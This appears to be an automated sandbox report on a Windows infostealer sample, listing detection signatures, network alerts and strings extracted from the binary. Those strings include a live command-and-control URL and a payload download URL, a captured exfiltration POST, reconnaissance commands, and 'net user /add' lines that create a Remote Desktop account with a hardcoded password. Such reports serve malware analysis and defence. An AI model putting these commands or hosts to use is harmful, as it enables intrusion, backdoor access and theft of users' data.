Edit tour

Windows Analysis Report
CwQQqCmqkY.exe

Overview

General Information

Sample name:	CwQQqCmqkY.exe renamed because original name is a hash value
Original sample name:	1a477a5659d817b01a50f2a80cb1d76e.exe
Analysis ID:	1580848
MD5:	1a477a5659d817b01a50f2a80cb1d76e
SHA1:	48a07f82c03c9a1b7b3c21caf356f1c67775e359
SHA256:	1940ba18ed66dd2f1c3d4dbd2fbf6cf3438bcdee1e108982fb557461106a8073
Tags:	Amadeyexeuser-abuse_ch
Infos:

Detection

MicroClip

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected MicroClip

Machine Learning detection for sample

Posts data to a JPG file (protocol mismatch)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create an SMB header

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

CwQQqCmqkY.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\CwQQqCmqkY.exe" MD5: 1A477A5659D817B01A50F2A80CB1D76E)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
CwQQqCmqkY.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xe8e4f:$s2: ReflectiveLoader@

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: CwQQqCmqkY.exe PID: 4144	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xe8e4f:$s2: ReflectiveLoader@
0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xe8e4f:$s2: ReflectiveLoader@

Suricata Signatures

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:04:19.428611+0100	2843856	1	A Network Trojan was detected	192.168.2.6	49733	185.81.68.147	80	TCP

Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831sD source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDD64000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,	0_2_00007FF7F132DDD8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1330138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F1330138
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13306C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F13306C8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13309A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,	0_2_00007FF7F13309A4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1321B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7F1321B60

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.6:49733 -> 185.81.68.147:80

Posts data to a JPG file (protocol mismatch)

Source: unknown

HTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 88734Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3rData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 38 50 9d 58 00 00 00 9a 00 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 8d 8b 5d 0a 80 20 10 06 9f ed 30 62 ac d9 fa dd 26 42 58 c1 7e 68 2b 28 3a 7c 75 81 e8 71 66 18 59 d7 59 31 6f 2a 56 d3 b2 e7 3e a9 1d a6 33 97 d2 d9 7e 1a e0 3d c1 02 64 9c a9 63 a0 c6 c8 8f e1 bb 62 44 1d 62 74 2d 33 35 10 c2 f1 72 f0 1c 98 e8 89 b8 c6 47 55 37 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 00 00 00 00 02 00 00 00 00 00 00 00 1e 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 65 76 65 6e 74 62 65 61 63 6f 6e 73 2e 64 61 74 03 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 30 f1 f3 90 bc 02 00 00 cf 03 00 00 1f 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 68 75 62 2d 73 69 67 6e 61 74 75 72 65 2e 74 78 74 65 92 cb 92 ab 36 14 45 3f e8 56 25 02 cc 4d 33 c8 c0 0f 10 60 5b 1

Source: global traffic

Source: Joe Sandbox View

IP Address: 185.81.68.147 185.81.68.147

Source: Joe Sandbox View

ASN Name: KLNOPT-ASFI KLNOPT-ASFI

Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F12B63A0 recv,

0_2_00007FF7F12B63A0

Source: unknown

Source: CwQQqCmqkY.exe	String found in binary or memory: http://185.81.68.147/gg.php
Source: CwQQqCmqkY.exe	String found in binary or memory: http://185.81.68.147/gg.phpReflectiveLoader
Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/gg.phps64
Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/gg.phpspace
Source: CwQQqCmqkY.exe, CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/psw.exe
Source: CwQQqCmqkY.exe	String found in binary or memory: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg
Source: CwQQqCmqkY.exe	String found in binary or memory: http://www.winimage.com/zLibDll
Source: CwQQqCmqkY.exe	String found in binary or memory: http://www.winimage.com/zLibDll1.3.1-wbr
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/hsts.html
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: CwQQqCmqkY.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F12F7B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

0_2_00007FF7F12F7B50

System Summary

Malicious sample detected (through community Yara rule)

Source: CwQQqCmqkY.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13312A4	0_2_00007FF7F13312A4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F129D690	0_2_00007FF7F129D690
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132773C	0_2_00007FF7F132773C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132FA1C	0_2_00007FF7F132FA1C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12B3E20	0_2_00007FF7F12B3E20
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1311ED0	0_2_00007FF7F1311ED0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132E23C	0_2_00007FF7F132E23C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F129C824	0_2_00007FF7F129C824
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132E7CC	0_2_00007FF7F132E7CC
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1330CD8	0_2_00007FF7F1330CD8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132EB30	0_2_00007FF7F132EB30
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F129CDD2	0_2_00007FF7F129CDD2
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13072BC	0_2_00007FF7F13072BC
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1322DE8	0_2_00007FF7F1322DE8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131F19C	0_2_00007FF7F131F19C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13074C0	0_2_00007FF7F13074C0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12B94A0	0_2_00007FF7F12B94A0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1309498	0_2_00007FF7F1309498
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F128D31C	0_2_00007FF7F128D31C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12D9370	0_2_00007FF7F12D9370
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13076C4	0_2_00007FF7F13076C4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12AB6B0	0_2_00007FF7F12AB6B0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12856A0	0_2_00007FF7F12856A0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13195D4	0_2_00007FF7F13195D4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F128B874	0_2_00007FF7F128B874
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12EF730	0_2_00007FF7F12EF730
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13237E8	0_2_00007FF7F13237E8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1311810	0_2_00007FF7F1311810
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13299F4	0_2_00007FF7F13299F4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13279B8	0_2_00007FF7F13279B8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1307D08	0_2_00007FF7F1307D08
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F7B50	0_2_00007FF7F12F7B50
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1321B60	0_2_00007FF7F1321B60
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F128DE8C	0_2_00007FF7F128DE8C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F129DED0	0_2_00007FF7F129DED0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12CFEC0	0_2_00007FF7F12CFEC0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F9EB0	0_2_00007FF7F12F9EB0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F130DD78	0_2_00007FF7F130DD78
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F7DD0	0_2_00007FF7F12F7DD0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1315DC4	0_2_00007FF7F1315DC4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F130808C	0_2_00007FF7F130808C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1286060	0_2_00007FF7F1286060
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F9F20	0_2_00007FF7F12F9F20
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131FF30	0_2_00007FF7F131FF30
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12C3FB0	0_2_00007FF7F12C3FB0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12BBFE0	0_2_00007FF7F12BBFE0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F130E284	0_2_00007FF7F130E284
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1288218	0_2_00007FF7F1288218
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12DE270	0_2_00007FF7F12DE270
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13101B0	0_2_00007FF7F13101B0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13284A0	0_2_00007FF7F13284A0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131E688	0_2_00007FF7F131E688
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1320638	0_2_00007FF7F1320638
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1308594	0_2_00007FF7F1308594
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131860C	0_2_00007FF7F131860C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131A610	0_2_00007FF7F131A610
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12AC830	0_2_00007FF7F12AC830
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12EC750	0_2_00007FF7F12EC750
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13107F8	0_2_00007FF7F13107F8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1314A7C	0_2_00007FF7F1314A7C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12C6AE0	0_2_00007FF7F12C6AE0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1326AD0	0_2_00007FF7F1326AD0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12D2930	0_2_00007FF7F12D2930
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12AACF0	0_2_00007FF7F12AACF0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12E6B20	0_2_00007FF7F12E6B20
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F131EB1C	0_2_00007FF7F131EB1C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1292E8C	0_2_00007FF7F1292E8C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132CE34	0_2_00007FF7F132CE34
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1324E54	0_2_00007FF7F1324E54
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1318D94	0_2_00007FF7F1318D94
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1322DE8	0_2_00007FF7F1322DE8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1321040	0_2_00007FF7F1321040

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12AF830 appears 52 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12C75A0 appears 41 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12FA4EC appears 38 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F132CC4C appears 73 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12AF9A0 appears 44 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12B61B0 appears 37 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12B6220 appears 83 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F1297150 appears 45 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12AF6F0 appears 449 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12AF7E0 appears 332 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F128A7DC appears 56 times
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: String function: 00007FF7F12C7670 appears 39 times

Source: CwQQqCmqkY.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts

Source: classification engine

Classification label: mal96.troj.spyw.winEXE@1/38@0/1

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

File created: C:\Users\user\AppData\Local\863CAFA4A9062357328583

Jump to behavior

Source: CwQQqCmqkY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CwQQqCmqkY.exe	Virustotal: Detection: 26%
Source: CwQQqCmqkY.exe	ReversingLabs: Detection: 52%

Source: CwQQqCmqkY.exe	String found in binary or memory: /add
Source: CwQQqCmqkY.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %u
Source: CwQQqCmqkY.exe	String found in binary or memory: /add
Source: CwQQqCmqkY.exe	String found in binary or memory: @Software\Dxiapp1Diamotrix_SDiamotrixGDU9MUEoLj86KxEsBAEdIA0KACc=DiamotrixFyYnOTg1ICwkGD8sGg4GF0VYDQcCQzMoJCQPJRsETTsbHQULntdll.dllRtlAdjustPrivilegeNtRaiseHardErrorSoftware\ccxccxccxRunOnce\\LogFile.zipLogFile.zipimage/jpeg\Screenshot.jpghttp://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsWDiamotrixMAwMHQ==DiamotrixMRoEHzAQEx0ZDiamotrixMRoEHzAQEx0ZZ1s=DiamotrixMRoEHzAQEx0ZZ1o=DiamotrixMRoEHzAQEx0ZZ10=DiamotrixIQQOBwY=DiamotrixMwwDGwYRBQ==User Name: Computer Name: HWID: .Windows Version: Install Path: Processor Architecture: Page Size: Number of Processors: Processor Type: MBRAM Size: x Screen Resolution: System Language: BIOS Version: %s\Windows\Users\Program Files\\Program Files (x86)\PerfLogs$Recycle.BinBoot%s\%s%s\%s\%s.txt.jpg.pdf.docx.csv.sql.db.py.cpp.h.dat.wallet.pkey...%s\%scmd.exe/c opentasklist > Running_processes.txttasklist /v > Open_windows.txtdriverquery > Drivers.txtwmic product get name,version > Installed_apps.txtsysteminfo > Info.txtipconfig /all > Network.txtfor /d %i in (C:\Users\) do if not "%i"=="C:\Users\Public" tree /F /A "%i" >> DirectoriesAndFiles.txtDiamotrixeWMhydGcXFEz2CLrVL /add net user /addnet localgroup "Remote Desktop Users" \Wallets\WalletsMessengers\MessengersSystem_info.txtRDP.txtRDP detected, user: Diamorix \| pass: eWMhydGcXFEz2CLrVLFile_Grabber\File_Grabber Mot qui, plac

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: ntmarta.dll	Jump to behavior
